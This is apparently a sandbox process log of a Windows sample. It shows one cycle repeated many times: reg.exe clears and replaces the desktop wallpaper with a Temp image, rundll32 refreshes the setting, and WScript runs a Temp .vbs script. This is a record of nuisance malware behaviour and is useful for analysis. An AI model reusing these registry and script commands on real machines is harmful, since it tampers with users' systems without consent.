reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
